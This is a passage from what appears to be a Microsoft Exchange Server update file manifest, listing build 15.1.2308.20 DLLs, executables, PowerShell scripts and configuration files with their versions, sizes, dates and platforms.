3-Nov-21| 18:37| x86 \nCts_policy.14.4.microsoft.exchange.data.common.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:37| x86 \nCts_policy.15.0.microsoft.exchange.data.common.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:37| x86 \nCts_policy.15.1.microsoft.exchange.data.common.dll| 15.1.2308.20| 13,192| 3-Nov-21| 18:37| x86 \nCts_policy.15.2.microsoft.exchange.data.common.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:37| x86 \nCts_policy.15.20.microsoft.exchange.data.common.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:37| x86 \nCts_policy.8.0.microsoft.exchange.data.common.dll| 15.1.2308.20| 12,664| 3-Nov-21| 18:37| x86 \nCts_policy.8.1.microsoft.exchange.data.common.dll| 15.1.2308.20| 12,680| 3-Nov-21| 18:37| x86 \nCts_policy.8.2.microsoft.exchange.data.common.dll| 15.1.2308.20| 12,680| 3-Nov-21| 18:37| x86 \nCts_policy.8.3.microsoft.exchange.data.common.dll| 15.1.2308.20| 12,680| 3-Nov-21| 18:37| x86 \nDagcommonlibrary.ps1| Not applicable| 60,238| 3-Nov-21| 18:37| Not applicable \nDependentassemblygenerator.exe| 15.1.2308.20| 22,392| 3-Nov-21| 18:39| x86 \nDiaghelper.dll| 15.1.2308.20| 66,960| 3-Nov-21| 18:37| x86 \nDiagnosticscriptcommonlibrary.ps1| Not applicable| 16,346| 3-Nov-21| 18:52| Not applicable \nDisableinmemorytracing.ps1| Not applicable| 13,394| 3-Nov-21| 18:41| Not applicable \nDisable_antimalwarescanning.ps1| Not applicable| 15,221| 3-Nov-21| 18:41| Not applicable \nDisable_outsidein.ps1| Not applicable| 13,686| 3-Nov-21| 18:41| Not applicable \nDisklockerapi.dll| Not applicable| 22,392| 3-Nov-21| 18:37| x64 \nDlmigrationmodule.psm1| Not applicable| 39,572| 3-Nov-21| 18:41| Not applicable \nDsaccessperf.dll| 15.1.2308.20| 45,968| 3-Nov-21| 18:28| x64 \nDscperf.dll| 15.1.2308.20| 32,648| 3-Nov-21| 18:36| x64 \nDup_cts_microsoft.exchange.data.common.dll| 15.1.2308.20| 1,686,904| 3-Nov-21| 18:28| x86 \nDup_ext_microsoft.exchange.data.transport.dll| 15.1.2308.20| 601,488| 3-Nov-21| 19:03| x86 \nEcpperfcounters.xml| Not applicable| 31,160| 3-Nov-21| 18:28| Not applicable \nEdgeextensibility_microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEdgeextensibility_policy.8.0.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,200| 3-Nov-21| 18:37| x86 \nEdgetransport.exe| 15.1.2308.20| 49,544| 3-Nov-21| 20:13| x86 \nEext.14.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEext.14.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEext.14.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEext.14.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEext.14.4.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEext.15.0.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEext.15.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEext.15.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEext.15.20.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEext.8.1.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEext.8.2.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEext.8.3.microsoft.exchange.data.transport.versionpolicy.cfg| Not applicable| 520| 3-Nov-21| 18:13| Not applicable \nEext_policy.14.0.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:20| x86 \nEext_policy.14.1.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,192| 3-Nov-21| 18:37| x86 \nEext_policy.14.2.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:37| x86 \nEext_policy.14.3.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,184| 3-Nov-21| 18:37| x86 \nEext_policy.14.4.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,192| 3-Nov-21| 18:37| x86 \nEext_policy.15.0.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:37| x86 \nEext_policy.15.1.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,200| 3-Nov-21| 18:37| x86 \nEext_policy.15.2.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:22| x86 \nEext_policy.15.20.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,200| 3-Nov-21| 18:37| x86 \nEext_policy.8.1.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,192| 3-Nov-21| 18:37| x86 \nEext_policy.8.2.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:38| x86 \nEext_policy.8.3.microsoft.exchange.data.transport.dll| 15.1.2308.20| 13,192| 3-Nov-21| 18:37| x86 \nEnableinmemorytracing.ps1| Not applicable| 13,356| 3-Nov-21| 18:41| Not applicable \nEnable_antimalwarescanning.ps1| Not applicable| 17,595| 3-Nov-21| 18:41| Not applicable \nEnable_basicauthtooauthconverterhttpmodule.ps1| Not applicable| 18,620| 3-Nov-21| 18:41| Not applicable \nEnable_crossforestconnector.ps1| Not applicable| 18,590| 3-Nov-21| 18:41| Not applicable \nEnable_outlookcertificateauthentication.ps1| Not applicable| 22,948| 3-Nov-21| 18:41| Not applicable \nEnable_outsidein.ps1| Not applicable| 13,679| 3-Nov-21| 18:41| Not applicable \nEngineupdateserviceinterfaces.dll| 15.1.2308.20| 17,800| 3-Nov-21| 18:42| x86 \nEscprint.dll| 15.1.2308.20| 20,344| 3-Nov-21| 18:22| x64 \nEse.dll| 15.1.2308.20| 3,695,496| 3-Nov-21| 18:29| x64 \nEseback2.dll| 15.1.2308.20| 325,000| 3-Nov-21| 18:36| x64 \nEsebcli2.dll| 15.1.2308.20| 292,728| 3-Nov-21| 18:28| x64 \nEseperf.dll| 15.1.2308.20| 116,088| 3-Nov-21| 18:36| x64 \nEseutil.exe| 15.1.2308.20| 398,712| 3-Nov-21| 18:37| x64 \nEsevss.dll| 15.1.2308.20| 44,408| 3-Nov-21| 18:37| x64 \nEtweseproviderresources.dll| 15.1.2308.20| 82,320| 3-Nov-21| 18:20| x64 \nEventperf.dll| 15.1.2308.20| 59,784| 3-Nov-21| 18:20| x64 \nExchange.depthtwo.types.ps1xml| Not applicable| 40,132| 3-Nov-21| 21:05| Not applicable \nExchange.format.ps1xml| Not applicable| 648,635| 3-Nov-21| 21:05| Not applicable \nExchange.partial.types.ps1xml| Not applicable| 43,349| 3-Nov-21| 21:05| Not applicable \nExchange.ps1| Not applicable| 20,783| 3-Nov-21| 21:05| Not applicable \nExchange.support.format.ps1xml| Not applicable| 26,574| 3-Nov-21| 20:53| Not applicable \nExchange.types.ps1xml| Not applicable| 365,172| 3-Nov-21| 21:05| Not applicable \nExchangeudfcommon.dll| 15.1.2308.20| 121,736| 3-Nov-21| 18:29| x86 \nExchangeudfs.dll| 15.1.2308.20| 269,704| 3-Nov-21| 18:37| x86 \nExchmem.dll| 15.1.2308.20| 85,904| 3-Nov-21| 18:23| x64 \nExchsetupmsg.dll| 15.1.2308.20| 19,320| 3-Nov-21| 18:30| x64 \nExchucutil.ps1| Not applicable| 23,912| 3-Nov-21| 18:41| Not applicable \nExdbfailureitemapi.dll| Not applicable| 27,024| 3-Nov-21| 18:23| x64 \nExdbmsg.dll| 15.1.2308.20| 229,752| 3-Nov-21| 18:37| x64 \nExeventperfplugin.dll| 15.1.2308.20| 25,464| 3-Nov-21| 18:42| x64 \nExmime.dll| 15.1.2308.20| 364,936| 3-Nov-21| 18:41| x64 \nExportedgeconfig.ps1| Not applicable| 27,423| 3-Nov-21| 18:41| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,590| 3-Nov-21| 18:41| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 28,886| 3-Nov-21| 18:41| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,390| 3-Nov-21| 18:30| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,157| 3-Nov-21| 18:41| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,076| 3-Nov-21| 18:41| Not applicable \nExppw.dll| 15.1.2308.20| 83,320| 3-Nov-21| 18:22| x64 \nExprfdll.dll| 15.1.2308.20| 26,488| 3-Nov-21| 18:39| x64 \nExrpc32.dll| 15.1.2308.20| 1,922,936| 3-Nov-21| 18:37| x64 \nExrw.dll| 15.1.2308.20| 28,024| 3-Nov-21| 18:28| x64 \nExsetdata.dll| 15.1.2308.20| 2,779,024| 3-Nov-21| 18:41| x64 \nExsetup.exe| 15.1.2308.20| 35,208| 3-Nov-21| 20:55| x86 \nExsetupui.exe| 15.1.2308.20| 193,416| 3-Nov-21| 20:55| x86 \nExtrace.dll| 15.1.2308.20| 245,128| 3-Nov-21| 18:22| x64 \nExt_microsoft.exchange.data.transport.dll| 15.1.2308.20| 601,488| 3-Nov-21| 19:03| x86 \nExwatson.dll| 15.1.2308.20| 44,920| 3-Nov-21| 18:29| x64 \nFastioext.dll| 15.1.2308.20| 60,280| 3-Nov-21| 18:41| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,715| 3-Nov-21| 22:28| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,229| 3-Nov-21| 22:28| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,761| 3-Nov-21| 22:28| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,406| 3-Nov-21| 22:28| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,658| 3-Nov-21| 22:28| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,727| 3-Nov-21| 22:28| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,712| 3-Nov-21| 22:28| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,688| 3-Nov-21| 22:28| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 3-Nov-21| 22:26| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,346| 3-Nov-21| 22:28| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,260| 3-Nov-21| 22:28| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,755| 3-Nov-21| 22:28| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,597,359| 3-Nov-21| 22:27| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,597,359| 3-Nov-21| 22:27| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,597,359| 3-Nov-21| 22:27| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,731| 3-Nov-21| 22:28| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,761| 3-Nov-21| 22:28| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,597,359| 3-Nov-21| 22:27| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,718| 3-Nov-21| 22:28| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,597,359| 3-Nov-21| 22:27| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,742| 3-Nov-21| 22:28| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,758| 3-Nov-21| 22:28| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,718| 3-Nov-21| 22:28| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 3-Nov-21| 22:26| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| #########| 3-Nov-21| 22:28| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,745| 3-Nov-21| 22:28| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,718| 3-Nov-21| 22:28| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,597,359| 3-Nov-21| 22:27| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,724| 3-Nov-21| 22:28| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 3-Nov-21| 22:28| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,223| 3-Nov-21| 18:41| Not applicable \nFilteringpowershell.dll| 15.1.2308.20| 223,120| 3-Nov-21| 18:45| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,664| 3-Nov-21| 18:45| Not applicable \nFiltermodule.dll| 15.1.2308.20| 180,104| 3-Nov-21| 18:37| x64 \nFipexeuperfctrresource.dll| 15.1.2308.20| 15,224| 3-Nov-21| 18:22| x64 \nFipexeventsresource.dll| 15.1.2308.20| 44,920| 3-Nov-21| 18:37| x64 \nFipexperfctrresource.dll| 15.1.2308.20| 32,632| 3-Nov-21| 18:22| x64 \nFirewallres.dll| 15.1.2308.20| 72,568| 3-Nov-21| 18:22| x64 \nFms.exe| 15.1.2308.20| 1,350,008| 3-Nov-21| 18:52| x64 \nForefrontactivedirectoryconnector.exe| 15.1.2308.20| 110,992| 3-Nov-21| 18:23| x64 \nFpsdiag.exe| 15.1.2308.20| 18,824| 3-Nov-21| 18:37| x86 \nFsccachedfilemanagedlocal.dll| 15.1.2308.20| 822,160| 3-Nov-21| 18:22| x64 \nFscconfigsupport.dll| 15.1.2308.20| 56,720| 3-Nov-21| 18:22| x86 \nFscconfigurationserver.exe| 15.1.2308.20| 430,984| 3-Nov-21| 18:28| x64 \nFscconfigurationserverinterfaces.dll| 15.1.2308.20| 15,752| 3-Nov-21| 18:29| x86 \nFsccrypto.dll| 15.1.2308.20| 208,760| 3-Nov-21| 18:20| x64 \nFscipcinterfaceslocal.dll| 15.1.2308.20| 28,560| 3-Nov-21| 18:20| x86 \nFscipclocal.dll| 15.1.2308.20| 38,288| 3-Nov-21| 18:23| x86 \nFscsqmuploader.exe| 15.1.2308.20| 453,496| 3-Nov-21| 18:36| x64 \nGetucpool.ps1| Not applicable| 19,807| 3-Nov-21| 18:41| Not applicable \nGetvalidengines.ps1| Not applicable| 13,270| 3-Nov-21| 18:52| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,805| 3-Nov-21| 18:20| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,671| 3-Nov-21| 18:20| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,703| 3-Nov-21| 18:20| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,755| 3-Nov-21| 18:20| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,494| 3-Nov-21| 18:20| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,721| 3-Nov-21| 18:20| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,806| 3-Nov-21| 18:20| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,368| 3-Nov-21| 18:41| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,979| 3-Nov-21| 18:41| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,058| 3-Nov-21| 18:41| Not applicable \nGet_storetrace.ps1| Not applicable| 50,611| 3-Nov-21| 18:36| Not applicable \nHuffman_xpress.dll| 15.1.2308.20| 32,648| 3-Nov-21| 18:36| x64 \nImportedgeconfig.ps1| Not applicable| 77,280| 3-Nov-21| 18:41| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,512| 3-Nov-21| 18:41| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,810| 3-Nov-21| 18:41| Not applicable \nInproxy.dll| 15.1.2308.20| 85,904| 3-Nov-21| 18:30| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,555| 3-Nov-21| 18:44| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,945| 3-Nov-21| 18:20| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,963| 3-Nov-21| 21:30| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2308.20| 107,408| 3-Nov-21| 18:22| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2308.20| 20,360| 3-Nov-21| 18:28| Not applicable \nInterop.certenroll.dll| 15.1.2308.20| 142,712| 3-Nov-21| 18:20| x86 \nInterop.licenseinfointerface.dll| 15.1.2308.20| 14,216| 3-Nov-21| 18:36| x86 \nInterop.netfw.dll| 15.1.2308.20| 34,168| 3-Nov-21| 18:20| x86 \nInterop.plalibrary.dll| 15.1.2308.20| 72,592| 3-Nov-21| 18:20| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2308.20| 27,000| 3-Nov-21| 18:20| Not applicable \nInterop.taskscheduler.dll| 15.1.2308.20| 46,456| 3-Nov-21| 18:28| x86 \nInterop.wuapilib.dll| 15.1.2308.20| 60,816| 3-Nov-21| 18:29| x86 \nInterop.xenroll.dll| 15.1.2308.20| 39,800| 3-Nov-21| 18:20| x86 \nKerbauth.dll| 15.1.2308.20| 62,864| 3-Nov-21| 18:20| x64 \nLicenseinfointerface.dll| 15.1.2308.20| 643,448| 3-Nov-21| 18:37| x64 \nLpversioning.xml| Not applicable| 20,446| 3-Nov-21| 20:55| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,892| 3-Nov-21| 18:37| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.1.2308.20| 138,616| 3-Nov-21| 18:23| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 125,837| 3-Nov-21| 18:37| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,352| 3-Nov-21| 18:37| Not applicable \nMce.dll| 15.1.2308.20| 1,693,064| 3-Nov-21| 18:36| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,479| 3-Nov-21| 18:37| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,615| 3-Nov-21| 18:41| Not applicable \nMicrosoft.database.isam.dll| 15.1.2308.20| 127,368| 3-Nov-21| 18:37| x86 \nMicrosoft.dkm.proxy.dll| 15.1.2308.20| 26,000| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.1.2308.20| 68,496| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.1.2308.20| 17,784| 3-Nov-21| 18:23| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.1.2308.20| 232,840| 3-Nov-21| 20:48| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.1.2308.20| 15,736| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.1.2308.20| 43,384| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.1.2308.20| 1,775,504| 3-Nov-21| 20:28| x86 \nMicrosoft.exchange.airsync.dll1| 15.1.2308.20| 505,736| 3-Nov-21| 21:24| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.1.2308.20| 76,152| 3-Nov-21| 21:26| x86 \nMicrosoft.exchange.anchorservice.dll| 15.1.2308.20| 135,544| 3-Nov-21| 20:05| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.1.2308.20| 23,416| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.1.2308.20| 15,736| 3-Nov-21| 18:22| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.1.2308.20| 27,000| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.approval.applications.dll| 15.1.2308.20| 53,624| 3-Nov-21| 20:13| x86 \nMicrosoft.exchange.assistants.dll| 15.1.2308.20| 924,048| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.1.2308.20| 26,000| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.1.2308.20| 42,384| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.1.2308.20| 15,248| 3-Nov-21| 20:53| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.1.2308.20| 14,712| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.1.2308.20| 70,536| 3-Nov-21| 20:48| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.1.2308.20| 94,584| 3-Nov-21| 21:04| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.1.2308.20| 13,176| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.1.2308.20| 15,736| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.1.2308.20| 36,744| 3-Nov-21| 20:48| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.1.2308.20| 15,736| 3-Nov-21| 19:51| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.1.2308.20| 79,736| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.autodiscover.dll| 15.1.2308.20| 396,168| 3-Nov-21| 20:32| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.1.2308.20| 21,384| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.1.2308.20| 57,208| 3-Nov-21| 20:34| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.1.2308.20| 14,712| 3-Nov-21| 20:18| x86 \nMicrosoft.exchange.batchservice.dll| 15.1.2308.20| 35,720| 3-Nov-21| 20:21| x86 \nMicrosoft.exchange.cabutility.dll| 15.1.2308.20| 276,344| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.1.2308.20| 16,264| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.1.2308.20| 25,976| 3-Nov-21| 20:49| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.1.2308.20| 13,688| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.1.2308.20| 23,432| 3-Nov-21| 20:48| x86 \nMicrosoft.exchange.clients.common.dll| 15.1.2308.20| 377,736| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.1.2308.20| 83,856| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.clients.owa.dll| 15.1.2308.20| 2,970,488| 3-Nov-21| 21:25| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.1.2308.20| 5,028,728| 3-Nov-21| 21:22| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.1.2308.20| 894,352| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.clients.security.dll| 15.1.2308.20| 413,576| 3-Nov-21| 20:57| x86 \nMicrosoft.exchange.clients.strings.dll| 15.1.2308.20| 924,544| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.1.2308.20| 31,624| 3-Nov-21| 20:16| x86 \nMicrosoft.exchange.cluster.common.dll| 15.1.2308.20| 52,088| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.1.2308.20| 21,880| 3-Nov-21| 18:48| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.1.2308.20| 33,656| 3-Nov-21| 20:18| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.1.2308.20| 3,527,568| 3-Nov-21| 20:14| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.1.2308.20| 108,432| 3-Nov-21| 18:39| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.1.2308.20| 288,632| 3-Nov-21| 20:16| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.1.2308.20| 623,992| 3-Nov-21| 19:53| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.1.2308.20| 86,392| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.1.2308.20| 1,827,704| 3-Nov-21| 18:55| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.1.2308.20| 31,608| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.1.2308.20| 466,296| 3-Nov-21| 18:54| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.1.2308.20| 25,976| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.1.2308.20| 38,288| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.1.2308.20| 102,800| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.1.2308.20| 48,520| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.1.2308.20| 67,448| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.common.dll| 15.1.2308.20| 172,944| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.1.2308.20| 113,552| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.common.il.dll| 15.1.2308.20| 13,688| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.common.inference.dll| 15.1.2308.20| 130,424| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.common.optics.dll| 15.1.2308.20| 63,864| 3-Nov-21| 18:37| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.1.2308.20| 19,856| 3-Nov-21| 18:29| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.1.2308.20| 15,224| 3-Nov-21| 18:20| x86 \nMicrosoft.exchange.common.search.dll| 15.1.2308.20| 107,912| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.1.2308.20| 17,808| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.common.smtp.dll| 15.1.2308.20| 51,576| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.1.2308.20| 36,744| 3-Nov-21| 18:52| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.1.2308.20| 27,512| 3-Nov-21| 18:41| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.1.2308.20| 1,042,312| 3-Nov-21| 18:56| x86 \nMicrosoft.exchange.commonmsg.dll| 15.1.2308.20| 29,072| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.1.2308.20| 13,192| 3-Nov-21| 18:39| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.1.2308.20| 181,136| 3-Nov-21| 21:06| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.1.2308.20| 30,088| 3-Nov-21| 18:37| x64 \nMicrosoft.exchange.compliance.common.dll| 15.1.2308.20| 22,392| 3-Nov-21| 19:33| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.1.2308.20| 85,880| 3-Nov-21| 18:20| x64 \nMicrosoft.exchange.compliance.dll| 15.1.2308.20| 35,192| 3-Nov-21| 18:36| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.1.2308.20| 37,232| 3-Nov-21| 18:39| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.1.2308.20| 50,552| 3-Nov-21| 20:18| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.1.2308.20| 33,160| 3-Nov-21| 20:11| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.1.2308.20| 1,100,176| 3-Nov-21| 20:07| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.1.2308.20| 206,728| 3-Nov-21| 20:10| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.1.2308.20| 210,832| 3-Nov-21| 20:34| x86 \nMicrosoft.exchange.compression.dll| 15.1.2308.20| 17,288| 3-Nov-21| 18:41| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.1.2308.20| 37,776| 3-Nov-21| 20:04| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.1.2308.20| 14,200| 3-Nov-21| 18:23| x64 \nMicrosoft.exchange.configuration.core.dll| 15.1.2308.20| 150,416| 3-Nov-21| 19:52| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.1.2308.20| 14,200| 